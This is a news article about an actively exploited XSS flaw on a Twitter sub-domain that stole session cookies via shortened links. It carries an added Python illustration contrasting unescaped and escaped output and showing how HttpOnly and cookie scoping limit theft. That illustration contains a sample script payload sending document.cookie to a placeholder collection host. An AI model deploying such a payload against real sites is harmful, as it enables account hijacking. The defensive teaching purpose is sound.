A dangerous XSS bug surfaced on Twitter on Monday, and researchers have seen active exploits for the bug, which allows an attacker to steal the session cookie of a Twitter user with a simple click-and-you’re-owned technique.
Experts say that the attacks seem to be emanating from domains in Brazil, and that more than 100,000 users had already clicked on one malicious shortened URL related to the attack. And that’s just one link. It’s unclear how many other malicious links have been created to exploit this flaw.
“The malicious JavaScript payload that’s being distributed is rather simple. It uses an XSS (Cross-Site Scripting) vulnerability to steal the cookie of the Twitter user, which is transferred to two specific servers. Essentially, any account which clicked on the malicious links is compromised,” Stefan Tanase, an anti-malware researcher who specializes in social networking threats at Kaspersky Lab, said in an analysis of the Twitter exploit.
“All clues point to Brazil as the originating country for this attack. First, the 2 domain names used to get the stolen cookies are registered under Brazilian names. More than that, one of them is actually also hosted in Brazil.”
One of the tweets used to direct users to the malicious site exploiting the XSS bug is written in Brazilian Portuguese and references a Brazilian band.
Twitter officials said on Tuesday morning that the vulnerability has been fixed. However, the XSS flaw, which was on one of the many sub-domains that Twitter maintains, may just be the tip of the iceberg for the massively popular social networking platform. The shortened URLs that are essentially mandatory on Twitter, thanks to the platform’s 140-character limit on messages, are a serious weak link in the site’s security.
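The mechanics behind Tanase’s description, as an added illustration that is not code from the article or from the attack itself: a reflected-XSS handler with and without output encoding, a payload of the same shape (read document.cookie, ship it to a collection host), and a simulation of which cookies a script on a sub-domain page can actually read. Every host name, cookie name and value below is constructed for the demo; the real drop servers are not named on the page. The example uses Python’s standard http.cookiejar to apply browser cookie-scoping rules offline.

```python
"""Added example (not from the article): cookie-stealing XSS versus
output encoding, cookie scoping and HttpOnly. Hosts and values are made up."""
import email.message
import html
import urllib.request
from http.cookiejar import CookieJar

# Constructed payload of the shape described in the article: read document.cookie
# and send it to a collection server. "collector.example" is a placeholder host.
PAYLOAD = '<script>new Image().src="http://collector.example/?c="+document.cookie</script>'


def render_vulnerable(query):
    """Hypothetical handler that reflects user input unescaped (the bug class)."""
    return "<p>Results for %s</p>" % query


def render_fixed(query):
    """Same handler with HTML output encoding: the payload is displayed, not executed."""
    return "<p>Results for %s</p>" % html.escape(query, quote=True)


def payload_executes(page):
    """Crude check for the demo: an unescaped <script> tag reached the page."""
    return "<script>" in page


class _Response:
    """Minimal stand-in for an HTTP response so CookieJar can parse Set-Cookie offline."""

    def __init__(self, set_cookie_headers):
        self._hdrs = email.message.Message()
        for h in set_cookie_headers:
            self._hdrs["Set-Cookie"] = h

    def info(self):
        return self._hdrs


def jar_from_login(origin, set_cookie_headers):
    """Store cookies as if `origin` had returned them on login."""
    jar = CookieJar()
    jar.extract_cookies(_Response(set_cookie_headers), urllib.request.Request(origin))
    return jar


def cookies_sent_to(jar, url):
    """Names of the cookies a browser would attach to a request for `url`."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    hdr = req.get_header("Cookie") or ""
    return sorted(p.split("=", 1)[0].strip() for p in hdr.split(";") if p.strip())


def script_readable(jar, url):
    """Approximates document.cookie on a page at `url`: in-scope cookies minus HttpOnly ones."""
    hidden = {c.name for c in jar if c.has_nonstandard_attr("HttpOnly")}
    return [n for n in cookies_sent_to(jar, url) if n not in hidden]


ORIGIN = "https://www.example.com/"
SUBDOMAIN_PAGE = "https://status.example.com/"  # where the hypothetical XSS lives

# Weak: session cookie scoped to the parent domain, readable by script. An XSS
# on any sub-domain can read it and exfiltrate it.
WEAK = ["session=opaque-session-id; Domain=.example.com; Path=/; Secure"]
# Hardened: HttpOnly keeps the session cookie out of document.cookie even when
# the XSS fires; a host-only cookie (no Domain attribute) is not even sent to
# the sub-domain.
HARDENED = [
    "session=opaque-session-id; Domain=.example.com; Path=/; Secure; HttpOnly",
    "csrf=host-only-token; Path=/; Secure",
]


def stolen_by_xss(set_cookie_headers):
    """What a document.cookie exfiltration payload on the sub-domain page would capture."""
    return script_readable(jar_from_login(ORIGIN, set_cookie_headers), SUBDOMAIN_PAGE)


if __name__ == "__main__":
    print("vulnerable executes:", payload_executes(render_vulnerable(PAYLOAD)))
    print("fixed executes:", payload_executes(render_fixed(PAYLOAD)))
    print("weak cookies stolen:", stolen_by_xss(WEAK))
    print("hardened cookies stolen:", stolen_by_xss(HARDENED))
```

The point of the cookie half is the sub-domain caveat: a session cookie set with a parent-domain Domain attribute so that every sub-domain can use it is also exposed to an XSS on any of those sub-domains, and only HttpOnly (or narrower scoping) keeps it out of the payload’s reach. Output encoding removes the injection; HttpOnly limits the blast radius when encoding is missed somewhere.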
In many cases, users have no idea where these URLs will actually take them before they click on them, and attackers have pounced on this and used it to direct users to malicious sites that then launch drive-by attacks. This has turned out to be a deep well of exploitable fun for the attackers, and the XSS bug on Twitter is just one way for them to do their dirt. There are plenty of others, and researchers point out that the tens of thousands of third-party applications that use Twitter’s API are a good target, as well.
“They have ~70k other serious problems on other domains, aka Twitter apps,” researcher Aviv Raff said in a Twitter message on Tuesday.